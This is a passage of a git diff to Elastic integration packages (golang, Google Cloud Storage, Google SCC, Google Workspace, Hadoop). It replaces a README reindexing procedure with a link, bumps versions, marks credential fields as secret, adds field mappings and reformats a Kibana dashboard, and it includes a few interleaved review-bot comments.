@@ -37,97 +37,7 @@ For step-by-step instructions on how to set up an integration, see the [Getting ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Heap`` and ``Expvar`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Golang -> Integration policies` open the configuration of Golang and disable the `Collect Golang metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-golang.heap-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-golang.heap-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-golang.heap -``` -3. Go to `Integrations -> Golang -> Settings` and click on `Reinstall Golang`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-golang.heap-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Golang -> Integration policies` and open configuration of integration and enable the `Collect Golang metrics` toggle and save the integration. - -7. 
Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Heap`` and ``Expvar`` data streams. ## Metrics reference diff --git a/packages/golang/changelog.yml b/packages/golang/changelog.yml index ee90617a5a4..d5992cde7e8 100644 --- a/packages/golang/changelog.yml +++ b/packages/golang/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.4.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/golang/docs/README.md b/packages/golang/docs/README.md index 63d828e7192..9093936778c 100644 --- a/packages/golang/docs/README.md +++ b/packages/golang/docs/README.md 
@@ -37,97 +37,7 @@ For step-by-step instructions on how to set up an integration, see the [Getting ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Heap`` and ``Expvar`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Golang -> Integration policies` open the configuration of Golang and disable the `Collect Golang metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-golang.heap-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-golang.heap-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-golang.heap -``` -3. Go to `Integrations -> Golang -> Settings` and click on `Reinstall Golang`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-golang.heap-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Golang -> Integration policies` and open configuration of integration and enable the `Collect Golang metrics` toggle and save the integration. - -7. 
Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Heap`` and ``Expvar`` data streams. ## Metrics reference diff --git a/packages/golang/manifest.yml b/packages/golang/manifest.yml index dd721f5283e..467bd5f7590 100644 --- a/packages/golang/manifest.yml +++ b/packages/golang/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: golang title: Golang -version: "1.2.0" +version: "1.4.1" description: This Elastic integration collects metrics from Golang applications. type: integration categories: - observability conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -64,6 +64,7 @@ policy_templates: - name: password type: password title: Password + secret: true show_user: false required: false description: Enter password of Golang application. diff --git a/packages/google_cloud_storage/changelog.yml b/packages/google_cloud_storage/changelog.yml index 3d759cbf9fc..5e9240bad15 100644 --- a/packages/google_cloud_storage/changelog.yml +++ b/packages/google_cloud_storage/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/google_cloud_storage/manifest.yml b/packages/google_cloud_storage/manifest.yml index 1185d34bfcf..b28b876ef26 100644 --- a/packages/google_cloud_storage/manifest.yml +++ b/packages/google_cloud_storage/manifest.yml 
@@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: google_cloud_storage title: Custom GCS (Google Cloud Storage) Input description: Collect JSON data from configured GCS Bucket with Elastic Agent. type: integration -version: 1.0.1 +version: 1.1.0 conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" categories: - custom - cloud @@ -37,6 +37,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: Service Account File diff --git a/packages/google_scc/changelog.yml b/packages/google_scc/changelog.yml index 78d62e79186..f1cf90a7bd7 100644 --- a/packages/google_scc/changelog.yml +++ b/packages/google_scc/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9392 +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json b/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json index dd336ab0a34..3012324f884 100644 --- a/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json +++ b/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json @@ -505,7 +505,7 @@ "identity_type": "ANY_IDENTITY" }, "egress_to": { - "externalResources": [ + "external_resources": [ "string" ], "operations": [ 
@@ -583,7 +583,7 @@ "identity_type": "ANY_IDENTITY" }, "egress_to": { - "externalResources": [ + "external_resources": [ "string" ], "operations": [ diff --git a/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml b/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml index bcddbc0c678..d8d7b800648 100644 --- a/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml +++ b/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml @@ -630,6 +630,7 @@ processors: "operations": "operations" "methodSelectors": "method_selectors" "serviceName": "service_name" + "externalResources": "external_resources" tag: painless_to_rename_fields_under_servicePerimeter_status_egressPolicies_object source: | def renameKeys(Map json, Map keyMap) { @@ -688,6 +689,7 @@ processors: "operations": "operations" "methodSelectors": "method_selectors" "serviceName": "service_name" + "externalResources": "external_resources" tag: painless_to_rename_fields_under_servicePerimeter_spec_egressPolicies_object source: | def renameKeys(Map json, Map keyMap) { diff --git a/packages/google_scc/data_stream/asset/fields/fields.yml b/packages/google_scc/data_stream/asset/fields/fields.yml index c8714d9dca1..54f07819cd7 100644 --- a/packages/google_scc/data_stream/asset/fields/fields.yml +++ b/packages/google_scc/data_stream/asset/fields/fields.yml 
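Review bot: The `"externalResources": "external_resources"` entry added to both key maps renames a field that no hunk in this diff declares in `data_stream/asset/fields/fields.yml` (that file only gains `sub_networks` here), so unless `egress_to.external_resources` is already mapped there it will fall to dynamic mapping or be dropped, depending on the data stream's `dynamic` setting; please confirm the mapping exists or add `- name: external_resources` / `type: keyword` under the `egress_to` group so the updated expected-output JSON is backed by an explicit mapping. The two `keyMap` literals for the `spec` and `status` egressPolicies processors are now hand-maintained identical copies, and this change had to be applied twice; a one-line comment on each, e.g. `# keep in sync with the spec/status egressPolicies rename map`, would make the next addition less likely to land in only one of them. The `renameKeys` painless source continues outside the hunk.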
@@ -58,6 +58,9 @@ - name: required_access_levels type: keyword description: 'A list of other access levels defined in the same Policy, referenced by resource name. Referencing an AccessLevel which does not exist is an error. All access levels listed must be granted for the Condition to be true. Example: "accessPolicies/MY_POLICY/accessLevels/LEVEL_NAME".' + - name: sub_networks + type: keyword + description: CIDR block IP subnetwork specification. May be IPv4 or IPv6. Note that for a CIDR IP address block, the specified IP address portion must be properly truncated (i.e. all the host bits must be zero) or the input is considered malformed. For example, "192.0.2.0/24" is accepted but "192.0.2.1/24" is not. Similarly, for IPv6, "2001:db8::/32" is accepted whereas "2001:db8::1/32" is not. The originating IP of a request must be in one of the listed subnets in order for this Condition to be true. If empty, all IP addresses are allowed. - name: custom type: group fields: diff --git a/packages/google_scc/docs/README.md b/packages/google_scc/docs/README.md index 0657e99d658..44d9b3b8c08 100644 --- a/packages/google_scc/docs/README.md +++ b/packages/google_scc/docs/README.md 
@@ -248,6 +248,7 @@ An example event for `asset` looks as following: | google_scc.asset.access_level.basic.conditions.negate | Whether to negate the Condition. If true, the Condition becomes a NAND over its non-empty fields, each field must be false for the Condition overall to be satisfied. Defaults to false. | boolean | | google_scc.asset.access_level.basic.conditions.regions | The request must originate from one of the provided countries/regions. Must be valid ISO 3166-1 alpha-2 codes. | keyword | | google_scc.asset.access_level.basic.conditions.required_access_levels | A list of other access levels defined in the same Policy, referenced by resource name. Referencing an AccessLevel which does not exist is an error. All access levels listed must be granted for the Condition to be true. Example: "accessPolicies/MY_POLICY/accessLevels/LEVEL_NAME". | keyword | +| google_scc.asset.access_level.basic.conditions.sub_networks | CIDR block IP subnetwork specification. May be IPv4 or IPv6. Note that for a CIDR IP address block, the specified IP address portion must be properly truncated (i.e. all the host bits must be zero) or the input is considered malformed. For example, "192.0.2.0/24" is accepted but "192.0.2.1/24" is not. Similarly, for IPv6, "2001:db8::/32" is accepted whereas "2001:db8::1/32" is not. The originating IP of a request must be in one of the listed subnets in order for this Condition to be true. If empty, all IP addresses are allowed. | keyword | | google_scc.asset.access_level.custom.expression.description | Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI. | keyword | | google_scc.asset.access_level.custom.expression.location | Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file. 
| keyword | | google_scc.asset.access_level.custom.expression.text | Textual representation of an expression in Common Expression Language syntax. | keyword | diff --git a/packages/google_scc/manifest.yml b/packages/google_scc/manifest.yml index 8d0073053df..ed94f36ccb1 100644 --- a/packages/google_scc/manifest.yml +++ b/packages/google_scc/manifest.yml @@ -1,15 +1,16 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: google_scc title: Google Security Command Center -version: "1.0.1" +version: "1.2.0" description: Collect logs from Google Security Command Center with Elastic Agent. type: integration categories: - google_cloud - security + - cloudsecurity_cdr conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -66,6 +67,7 @@ policy_templates: required: false show_user: true description: "Path to a JSON or JSON blob file containing the credentials and key used to subscribe. Note: This is required field if not installed in GCP-Cloud Environment." + secret: true - name: parent_type type: select title: Parent Type @@ -152,6 +154,7 @@ policy_templates: required: true show_user: true description: Path to a JSON or JSON blob file containing the credentials and key used to subscribe. + secret: true - name: project_id type: text title: Project ID diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index adb4771e757..010fd45cdc2 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9527 +- version: "2.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "2.19.2" changes: - description: Changed owners 
diff --git a/packages/google_workspace/data_stream/alert/fields/fields.yml b/packages/google_workspace/data_stream/alert/fields/fields.yml index bc9dfadfd94..70b012cef47 100644 --- a/packages/google_workspace/data_stream/alert/fields/fields.yml +++ b/packages/google_workspace/data_stream/alert/fields/fields.yml @@ -220,6 +220,8 @@ - name: recipient type: keyword description: The recipient of this email. + - name: recipient_email + type: keyword - name: subject_text type: keyword description: The email subject text (only available for reported emails). @@ -373,6 +375,9 @@ - name: info type: nested description: Metadata related to the triggered actions. + fields: + - name: object + type: keyword - name: types type: keyword description: Actions applied as a consequence of the rule being triggered. diff --git a/packages/google_workspace/docs/README.md b/packages/google_workspace/docs/README.md index 05685553e3a..11d81229b57 100644 --- a/packages/google_workspace/docs/README.md +++ b/packages/google_workspace/docs/README.md @@ -1550,6 +1550,7 @@ An example event for `alert` looks as following: | google_workspace.alert.data.messages.md5.hash.subject | The MD5 Hash of email's subject (only available for reported emails). | keyword | | google_workspace.alert.data.messages.message_body_snippet | The snippet of the message body text (only available for reported emails). | keyword | | google_workspace.alert.data.messages.recipient | The recipient of this email. | keyword | +| google_workspace.alert.data.messages.recipient_email | | keyword | | google_workspace.alert.data.messages.subject_text | The email subject text (only available for reported emails). | keyword | | google_workspace.alert.data.name | Rule name. | keyword | | google_workspace.alert.data.next_update_time | Timestamp by which the next update is expected to arrive. | date | 
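Review bot: `recipient_email` under `messages` and the new `object` field under `triggered.action.info` are added without a `description`, which is why the regenerated README table in this diff renders empty description cells for `google_workspace.alert.data.messages.recipient_email` and `...triggered.action.info.object`. Every sibling field in these blocks carries a description, so please add one to each, e.g. `description: Email address of the recipient of this email.` and `description: The object the triggered action was applied to.`, adjusted to whatever the Alert Center API schema actually documents for these fields. Without them, analysts reading the field reference cannot tell how `recipient_email` differs from the existing `recipient` field.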
@@ -1574,7 +1575,7 @@ An example event for `alert` looks as following: | google_workspace.alert.data.rule.violation_info.suppressed.action.types | Actions suppressed due to other actions with higher priority. | keyword | | google_workspace.alert.data.rule.violation_info.trigger.user.email | Email of the user who caused the violation. Value could be empty if not applicable, for example, a violation found by drive continuous scan. | keyword | | google_workspace.alert.data.rule.violation_info.trigger.value | Trigger of the rule. | keyword | -| google_workspace.alert.data.rule.violation_info.triggered.action.info | Metadata related to the triggered actions. | nested | +| google_workspace.alert.data.rule.violation_info.triggered.action.info.object | | keyword | | google_workspace.alert.data.rule.violation_info.triggered.action.types | Actions applied as a consequence of the rule being triggered. | keyword | | google_workspace.alert.data.rule_description | Description of the rule. | text | | google_workspace.alert.data.source.ip | The source IP address of the malicious email. | ip | diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml index c6596a7ecc5..21c722550c7 100644 --- a/packages/google_workspace/manifest.yml +++ b/packages/google_workspace/manifest.yml @@ -1,17 +1,17 @@ name: google_workspace title: Google Workspace -version: "2.19.2" +version: "2.21.0" source: license: Elastic-2.0 description: Collect logs from Google Workspace with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: - security - productivity_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: 
@@ -72,7 +72,7 @@ policy_templates: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: jwt_json - type: text + type: password title: Jwt JSON description: | Raw contents of the JWT file. Useful when hosting a file along with the agent is not possible. @@ -80,6 +80,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: delegated_account type: text title: Delegated Account diff --git a/packages/hadoop/_dev/build/docs/README.md b/packages/hadoop/_dev/build/docs/README.md index da33b0b5023..0b0cafc92aa 100644 --- a/packages/hadoop/_dev/build/docs/README.md +++ b/packages/hadoop/_dev/build/docs/README.md @@ -17,7 +17,7 @@ This integration has been tested against Hadoop version `3.3.6`. ### Troubleshooting If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. +If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. ## application 
diff --git a/packages/hadoop/changelog.yml b/packages/hadoop/changelog.yml index 6b97ab99584..ad2f90ed3cb 100644 --- a/packages/hadoop/changelog.yml +++ b/packages/hadoop/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.5.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 +- version: "1.5.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.5.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/hadoop/docs/README.md b/packages/hadoop/docs/README.md index a54cc4ebed1..bce0513c7d9 100644 --- a/packages/hadoop/docs/README.md +++ b/packages/hadoop/docs/README.md @@ -17,7 +17,7 @@ This integration has been tested against Hadoop version `3.3.6`. ### Troubleshooting If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. +If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. ## application 
diff --git a/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json index 6939076d93d..13abf7bc94c 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json +++ b/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json 
@@ -1,652 +1,660 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"6df7972b-25f0-453b-829b-c183cddbc2f8\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"hadoop.application.id\",\"title\":\"Applications\",\"id\":\"6df7972b-25f0-453b-829b-c183cddbc2f8\",\"enhancements\":{}}}}" - }, - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "dcf6a578-de72-4570-9fd8-f157f6494eb8": { - "columnOrder": [ - "bf367b81-240d-468f-bd19-7b42516a2d6f", - "75832028-a5ee-46c0-b95b-32f5a04b39c4" - ], - "columns": { - "75832028-a5ee-46c0-b95b-32f5a04b39c4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Elapsed Time (ms)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.time.elapsed" - }, - "bf367b81-240d-468f-bd19-7b42516a2d6f": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "75832028-a5ee-46c0-b95b-32f5a04b39c4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, 
- "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "75832028-a5ee-46c0-b95b-32f5a04b39c4" - ], - "layerId": "dcf6a578-de72-4570-9fd8-f157f6494eb8", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "bf367b81-240d-468f-bd19-7b42516a2d6f", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "75832028-a5ee-46c0-b95b-32f5a04b39c4" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } + "id": "hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "Wzk5LDFd", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"6df7972b-25f0-453b-829b-c183cddbc2f8\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"hadoop.application.id\",\"title\":\"Applications\",\"id\":\"6df7972b-25f0-453b-829b-c183cddbc2f8\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + 
"syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "dcf6a578-de72-4570-9fd8-f157f6494eb8": { + "columnOrder": [ + "bf367b81-240d-468f-bd19-7b42516a2d6f", + "75832028-a5ee-46c0-b95b-32f5a04b39c4" + ], + "columns": { + "75832028-a5ee-46c0-b95b-32f5a04b39c4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Elapsed Time (ms)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.time.elapsed" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 24, - "i": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", - "w": 18, - "x": 0, - "y": 0 - }, - "panelIndex": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", - "title": "Elapsed time of different applications [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "358c9e71-f4a3-4980-adec-21e72950e734": { - "columnOrder": [ - "d03524e9-64ac-4ac9-87e9-680f408594b7" - ], - "columns": { - "d03524e9-64ac-4ac9-87e9-680f408594b7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average Elapsed Time", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "duration", - "params": { - "decimals": 0, - "fromUnit": "milliseconds" - } - } - }, - 
"scale": "ratio", - "sourceField": "hadoop.application.time.elapsed" - } - }, - "incompleteColumns": {} - } - } - } + "bf367b81-240d-468f-bd19-7b42516a2d6f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "75832028-a5ee-46c0-b95b-32f5a04b39c4", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "d03524e9-64ac-4ac9-87e9-680f408594b7", - "layerId": "358c9e71-f4a3-4980-adec-21e72950e734", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "9fed89bd-d709-4c4a-a84a-93b4d805940a", - "w": 8, - "x": 18, - "y": 0 + "layers": [ + { + "accessors": [ + "75832028-a5ee-46c0-b95b-32f5a04b39c4" + ], + "layerId": "dcf6a578-de72-4570-9fd8-f157f6494eb8", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "bf367b81-240d-468f-bd19-7b42516a2d6f", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "75832028-a5ee-46c0-b95b-32f5a04b39c4" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "9fed89bd-d709-4c4a-a84a-93b4d805940a", - "title": "Average elapsed time [Metrics Hadoop]", - "type": "lens", - 
"version": "8.10.2" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "c0d13a02-cbb4-496c-88bd-6187253ec8d8": { - "columnOrder": [ - "71dbc991-2911-4abe-b977-4dda3d9d5bb0", - "b1201382-d991-47f1-9466-b0a4231edf29" - ], - "columns": { - "71dbc991-2911-4abe-b977-4dda3d9d5bb0": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "b1201382-d991-47f1-9466-b0a4231edf29", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - }, - "b1201382-d991-47f1-9466-b0a4231edf29": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Virtual Cores", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.vcore_seconds" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - 